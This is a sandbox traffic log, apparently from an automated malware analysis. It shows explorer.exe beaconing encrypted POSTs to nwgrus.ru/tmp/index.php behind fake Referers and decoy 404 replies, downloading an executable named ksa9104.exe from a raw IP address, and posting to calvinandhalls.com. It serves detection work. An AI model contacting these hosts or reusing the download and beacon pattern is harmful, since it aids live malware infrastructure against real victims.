                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                        Session ID 28 | Source 192.168.2.5:49969 | Destination 105.197.97.247:80 | PID 1028 | Process C:\Windows\explorer.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Oct 7, 2024 14:59:52.670686960 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://tiisncfdrpaiu.org/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 361
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:52.670716047 CEST | 361 | OUT | Data Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 10 6b 2c 90 f5 76 0b 75 28 20 f9 f4
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vu( E9{@Hsf;W[Ew2D X-Q/NHfUzq';$t* r_t/?D){fIMZ/@eA::
                                        Oct 7, 2024 14:59:53.587590933 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:53 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                        Session ID 29 | Source 192.168.2.5:49975 | Destination 105.197.97.247:80 | PID 1028 | Process C:\Windows\explorer.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Oct 7, 2024 14:59:53.597395897 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://gieumfrwvwjruuah.com/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 114
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:53.597424984 CEST | 114 | OUT | Data Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 11 6b 2c 90 f5 76 0b 75 7b 0b fa 8d
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vu{SCXtnD3%5Q
                                        Oct 7, 2024 14:59:54.529414892 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:54 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                        Session ID 30 | Source 192.168.2.5:49979 | Destination 105.197.97.247:80 | PID 1028 | Process C:\Windows\explorer.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Oct 7, 2024 14:59:54.555557013 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://hkihwrdtvsi.org/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 189
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:54.555573940 CEST | 189 | OUT | Data Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 16 6b 2c 90 f5 76 0b 75 28 58 a1 a5
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vu(X6EWiIq%fPovpcDlh 1%(`>fi0Hq;UXVm
                                        Oct 7, 2024 14:59:56.015954018 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:55 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                                        Oct 7, 2024 14:59:56.016052008 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:55 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                        Session ID 31 | Source 192.168.2.5:49982 | Destination 105.197.97.247:80 | PID 1028 | Process C:\Windows\explorer.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Oct 7, 2024 14:59:56.027776003 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://bqpiqprsuajpd.net/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 149
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:56.027798891 CEST149OUTData Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 17 6b 2c 90 f5 76 0b 75 3e 2f c1 bc
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vu>/Pq +<g(-&XsKF\9Iz#sS1$
                                        Oct 7, 2024 14:59:57.166579962 CEST484INHTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:56 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.5 | 49993 | 105.197.97.247 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 14:59:57.417840958 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://fsqorqnhaeehy.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 230
Host: nwgrus.ru
Oct 7, 2024 14:59:57.417864084 CEST | 230 | OUT | Data Raw: [binary request body, 230 bytes]
Oct 7, 2024 14:59:58.324579954 CEST | 484 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 12:59:58 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.5 | 49998 | 105.197.97.247 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 14:59:58.333836079 CEST | 279 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://eihhylujhlro.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 360
Host: nwgrus.ru
Oct 7, 2024 14:59:58.333861113 CEST | 360 | OUT | Data Raw: [binary request body, 360 bytes]
Oct 7, 2024 14:59:59.252855062 CEST | 484 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 12:59:59 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.5 | 50014 | 105.197.97.247 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 15:01:05.021487951 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://qcgaudpuoiuttos.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 249
Host: nwgrus.ru
Oct 7, 2024 15:01:05.021508932 CEST | 249 | OUT | Data Raw: [binary request body, 249 bytes]
Oct 7, 2024 15:01:05.953011990 CEST | 151 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 13:01:05 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Raw: 03 00 00 00 72 e8 84
Data Ascii: r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.5 | 50015 | 105.197.97.247 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 15:01:14.439160109 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://mhqikqiwjyotw.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 205
Host: nwgrus.ru
Oct 7, 2024 15:01:14.439188004 CEST | 205 | OUT | Data Raw: [binary request body, 205 bytes]
Oct 7, 2024 15:01:15.347242117 CEST | 151 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 13:01:15 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Raw: 03 00 00 00 72 e8 84
Data Ascii: r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.5 | 50016 | 105.197.97.247 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 15:01:26.161711931 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://dymavinnaeuaxxm.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 346
Host: nwgrus.ru
Oct 7, 2024 15:01:26.161739111 CEST | 346 | OUT | Data Raw: [binary request body, 346 bytes]
Oct 7, 2024 15:01:27.088217020 CEST | 151 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 13:01:26 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Raw: 03 00 00 00 72 e8 84
Data Ascii: r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.5 | 50019 | 105.197.97.247 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 15:01:44.417134047 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://xuqynkrewbaraj.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 238
Host: nwgrus.ru
Oct 7, 2024 15:01:44.417171001 CEST | 238 | OUT | Data Raw: [binary request body, 238 bytes]
Oct 7, 2024 15:01:46.179423094 CEST | 151 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 13:01:45 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Raw: 03 00 00 00 72 e8 84
Data Ascii: r
Oct 7, 2024 15:01:46.180727959 CEST | 151 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 13:01:45 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Raw: 03 00 00 00 72 e8 84
Data Ascii: r
Oct 7, 2024 15:01:46.181176901 CEST | 151 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 13:01:45 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Raw: 03 00 00 00 72 e8 84
Data Ascii: r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.5 | 50022 | 189.195.132.134 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 15:02:06.908350945 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://niarphxxbktdxvwh.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 339
Host: nwgrus.ru
Oct 7, 2024 15:02:06.908404112 CEST | 339 | OUT | Data Raw: [binary request body, 339 bytes]
Oct 7, 2024 15:02:07.858335972 CEST | 151 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 13:02:07 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Raw: 03 00 00 00 72 e8 84
Data Ascii: r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.5 | 50025 | 189.195.132.134 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 15:02:28.926256895 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://lqpnyjpucaq.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 132
Host: nwgrus.ru
Oct 7, 2024 15:02:28.926287889 CEST | 132 | OUT | Data Raw: [binary request body, 132 bytes]
Oct 7, 2024 15:02:29.863377094 CEST | 151 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 13:02:29 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Raw: 03 00 00 00 72 e8 84
Data Ascii: r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.5 | 50028 | 189.195.132.134 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 15:02:50.000724077 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://akokgrlutaukqvq.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 348
Host: nwgrus.ru
Oct 7, 2024 15:02:50.000741959 CEST | 348 | OUT | Data Raw: [binary request body, 348 bytes]
Oct 7, 2024 15:02:50.926397085 CEST | 151 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 13:02:50 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Raw: 03 00 00 00 72 e8 84
Data Ascii: r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49932 | 23.145.40.164 | 443 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-07 12:59:47 UTC | 162 | OUT | GET /ksa9104.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 23.145.40.164
2024-10-07 12:59:47 UTC | 327 | IN | HTTP/1.1 200 OK
Date: Mon, 07 Oct 2024 12:59:47 GMT
Server: Apache/2.4.52 (Ubuntu)
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Last-Modified: Mon, 07 Oct 2024 12:45:02 GMT
ETag: "6ce00-623e263b8c9a0"
Accept-Ranges: bytes
Content-Length: 445952
Connection: close
Content-Type: application/x-msdos-program
2024-10-07 12:59:47 UTC | 7865 | IN | Data Raw: [binary response body, first 7865 bytes of the downloaded PE file]
Data Ascii: MZ@!L!This program cannot be run in DOS mode.$___L__y__x__A___S_}__H__O__Rich_PELe
                                        Data Ascii:


Session ID: 1
Source IP: 192.168.2.5
Source Port: 50012
Destination IP: 188.40.141.211
Destination Port: 443
PID: 1028
Process: C:\Windows\explorer.exe

Timestamp: 2024-10-07 13:00:14 UTC
Bytes transferred: 289
Direction: OUT
Data:
POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://qchnpedxxogxdjn.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 112
Host: calvinandhalls.com
Timestamp: 2024-10-07 13:00:14 UTC
Bytes transferred: 112
Direction: OUT
Data: Data Raw (112-byte binary request body; hex dump omitted)
Timestamp: 2024-10-07 13:00:14 UTC
Bytes transferred: 163
Direction: IN
Data:
HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Content-Length: 0
Content-Type: application/octet-stream
Date: Mon, 07 Oct 2024 13:00:14 GMT
Connection: close


Session ID: 2
Source IP: 192.168.2.5
Source Port: 50013
Destination IP: 188.40.141.211
Destination Port: 443
PID: 1028
Process: C:\Windows\explorer.exe

Timestamp: 2024-10-07 13:00:16 UTC
Bytes transferred: 287
Direction: OUT
Data:
POST /search.php HTTP/1.1
